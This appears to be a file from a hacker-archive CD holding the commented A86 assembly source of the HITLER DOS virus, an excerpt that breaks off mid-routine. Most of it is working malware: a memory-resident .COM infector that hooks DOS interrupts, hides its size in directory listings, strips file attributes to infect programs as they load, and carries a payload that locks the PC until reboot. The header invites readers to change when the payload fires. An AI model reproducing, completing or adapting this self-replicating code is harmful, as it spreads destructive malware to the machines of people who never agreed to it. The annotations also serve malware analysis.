Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
HITLER.A86
Text File
|
1993-01-05
|
39KB
|
719 lines
;The HITLER virus: commented in a rough 'n' ready way by the
;Crypt Newsletter staff for issue #11, January 1993.
;The HITLER virus is a memory resident .COM infector which adds itself
;to the end of infected files. HITLER employs
;minimal directory stealth.
;The minimal stealth allows the virus to subtract its file size from
;infected targets when the user takes a look at them using "dir"
;functions while the virus is in memory.
;Most of HITLER's code is devoted to a huge data table which is a voice
;sample of some nut shouting "HITLER." The virus ties the effect to
;the timer tick function, but if you want to hear it immediately, change the
;source where indicated. The resulting code will assemble under A86. On
;execution the virus will lock the PC into the voice effect until reboot,
;rendering it uninfective, if annoying. Not all PC's can generate the
;HITLER sound effect - some will just buzz.
; Entry stub: the first code to run when an infected .COM starts.
; It works out where the body was loaded, asks the int 21h hook whether a
; copy is already resident and, if not, takes pgf paragraphs from the last
; memory block, copies the body there and re-vectors int 21h and int 1Ch.
; Every path ends at "failed", which copies five saved bytes back to cs:100h
; and returns there so the host program runs.
; Analyst notes: the AX=42ABh int 21h probe, the shrunken 'Z' memory block
; and the changed int 21h / int 1Ch vectors are the visible traces of this
; routine.
call rakett ; pushes the run-time address of "old" as the return address
old db '═ É!¡' ; five bytes that "failed" copies back to cs:100h; infect reads a target's first five bytes into this buffer
rakett: pop bp ; bp = run-time address of "old"
push bp ; keep a copy on the stack for the "pop si" at failed
add bp,-103h ; bp = load displacement (assumes "old" assembles at 103h - confirm against the full listing)
mov ax,42ABh ; residency probe: the resident ni21 hook answers this value with carry clear
int 21h
jnc failed ; carry clear = a copy is already resident, skip installation
cli
mov ax,3521h
int 21h ; get the current int 21h vector in es:bx
mov w [bp+offset old21],bx ; save it in old21, the operand used to chain
mov w [bp+offset old21+2],es ; to the original handler (see ni21 / int21)
mov al,1Ch ; NOTE(review): relies on ah still holding 35h after the call above
int 21h ; get the int 1Ch (timer tick) vector
cli
mov w [bp+offset old1C],bx ; save the timer tick vector in old1C
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380 ; preload "teller"; its use lies outside this excerpt
sti
call normalspeed ; defined outside this excerpt
mov si,ds
std
lodsb ; direction flag is set, so this steps si down by one; the byte loaded into al is not used
cld
mov ds,si ; ds = original ds - 1; presumably the memory control block in front of the PSP
xor bx,bx
mov cx,pgf ; pgf is defined outside this excerpt; used below as the amount to reserve
cmp b [bx],'Z' ; proceed only when the block signature is 'Z' (last block in the chain)
jne failed
mov ax,[bx+3] ; size field of the block
sub ax,cx
jc failed ; block is smaller than pgf, give up
mov [bx+3],ax ; shrink the block by pgf
sub [bx+12h],cx ; lower the word at offset 12h by the same amount (presumably the top-of-memory field at PSP:0002)
mov es,[bx+12h] ; es = the lowered value, used as the destination segment
push cs
pop ds
mov di,100h
mov si,bp
add si,di ; si = load displacement + 100h, the source address for the copy
mov cx,size ; size is defined outside this excerpt
rep movsb ; copy size bytes to es:100h
push es
pop ds
mov ax,2521h
mov dx,offset ni21 ; point int 21h at ni21 in the copied body
int 21h
mov al,1Ch ; NOTE(review): relies on ah still holding 25h
mov dx,offset ni1C ; point the timer tick at ni1C (defined outside this excerpt)
int 21h
failed: push cs
push cs
pop ds
pop es ; ds = es = cs
pop si ; si = run-time address of "old", pushed after rakett
mov di,100h
push di ; 100h becomes the return address for the ret below
movsw
movsw
movsb ; five bytes from "old" are now at cs:100h
mov cx,0FFh
mov si,100h
ret ; near return to cs:100h, handing control to the host
; FCB directory-search path of the int 21h hook. ni21 jumps here for
; ah=11h and ah=12h with the flags it pushed still on the stack.
; The original handler runs first; stealth is called only when al comes
; back as zero.
findFCB: popf ; restore the flags pushed at ni21
call int21 ; run the original int 21h handler
pushf
or al,al ; al = 0 means a directory entry was returned
jnz backFCB ; nothing found, hand the result back untouched
call stealth ; adjust the size field of the returned entry
backFCB: popf
iret
; Directory stealth: after a successful FCB search, subtracts "size" from
; the 32-bit length reported for entries that carry the infection marker.
; The marker is a time-stamp whose low five bits are all set (seconds
; field = 31, i.e. 62 seconds in DOS's two-second units).
; Only the copy in the disk transfer area is edited here; this routine
; writes nothing to disk. ax, bx, dx and es are preserved.
stealth: push ax
push bx
push dx
push es
mov ah,2Fh ; get disk transfer address in es:bx
call int21 ; via the original handler
cmp byte es:[bx],0FFh ; 0FFh in the first byte marks an extended FCB
jne normFCB ; plain FCB, offsets apply as they are
add bx,8 ; extended form: step 8 bytes further in before applying the offsets
normFCB: mov al,byte es:[bx+16h] ; byte at offset 16h, presumably the low byte of the time field
and al,31 ; keep the five seconds bits
xor al,31 ; zero only when all five were set
jnz shitFCB ; marker absent, leave the entry alone
mov ax,word es:[bx+1Ch] ; low word of the reported size
mov dx,word es:[bx+1Ch+2] ; high word of the reported size
sub ax,size ; 32-bit subtract of the virus length
sbb dx,0
jc shitFCB ; borrow: reported size is smaller than "size", leave it alone
mov word es:[bx+1Ch],ax ; store the reduced size back into the DTA
mov word es:[bx+1Ch+2],dx
shitFCB: ; restore the saved registers
pop es
pop dx
pop bx
pop ax
ret
; Resident int 21h hook. Dispatch on the request in ah/ax:
;   ah=11h / 12h  FCB directory search -> findFCB (size stealth)
;   ax=42ABh      residency probe      -> return with carry clear
;   ax=4B00h      program load         -> try to infect the file at ds:dx
;   anything else                      -> chain to the original handler
; Two instructions are assembled from raw opcode bytes so that their
; operands double as variables: "mov cx,old_attr" and the far jump through
; old21. Both operands are patched at run time.
; Analyst notes: on the 4B00h path the file's attributes are read, cleared
; to zero for the duration of the infect call and then written back, so
; the read-only bit does not protect a file; files with the system bit
; (test cl,4) are skipped.
ni21: pushf
cmp ah,11h ; FCB find first
je findFCB
cmp ah,12h ; FCB find next
je findFCB
cmp ax,42ABh ; residency probe issued by the entry stub
jne not_42AB
popf
clc ; carry clear = "already resident"
retf 2 ; far return that drops the caller's saved flags word, so the cleared carry is what the caller sees
not_42AB:
cmp ax,4B00h ; is a program being loaded?
jne not_4B00 ; no, chain to the original handler
call install_24 ; defined outside this excerpt; per the original note it installs a critical error handler
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h ; get file attributes of the file named at ds:dx
call int21
jc back1 ; failed? leave the file alone
mov cs:old_attr,cx ; patch the attributes into the operand of the mov cx below
test cl,4 ; system attribute set?
jnz back1 ; yes, skip this file
mov ax,4301h ; set attributes to zero (clears read-only among others)
xor cx,cx
call int21
jc back1 ; error? exit
push dx
push ds
call infect ; infection routine; continues past the end of this excerpt
pop ds
pop dx
mov ax,4301h ; set attributes again, this time to the saved value
db 0B9h ; opcode byte of mov cx,imm16
old_attr dw 0 ; its immediate operand: the attributes saved above
call int21
back1: ; common exit for the 4B00h path
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24 ; defined outside this excerpt; per the original note it restores the critical error handler
not_4B00:
back: popf
db 0EAh ; opcode byte of a far jmp
old21 dw 0,0 ; its offset:segment operand: the original int 21h vector, written by the entry stub
; Calls the original int 21h handler saved in old21, bypassing the hook.
; pushf followed by a far call builds the same stack frame an int
; instruction would, so the handler's iret returns to the ret below.
; In:  registers as for the DOS function being requested.
; Out: whatever the original handler returns.
int21: pushf
call dword ptr cs:old21 ; far call through the saved vector
ret
infect: mov ax,3D02h ; open host file with read/write access
call int21
jnc okay_open
bad1: ret ; was there an error? exit
okay_open: xchg bx,ax
mov ax,5700h ; get file date and file time
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh ; read first five bytes from potential host
mov cx,5
mov dx,offset old ; store them here
push cs
pop ds
call int21
jc close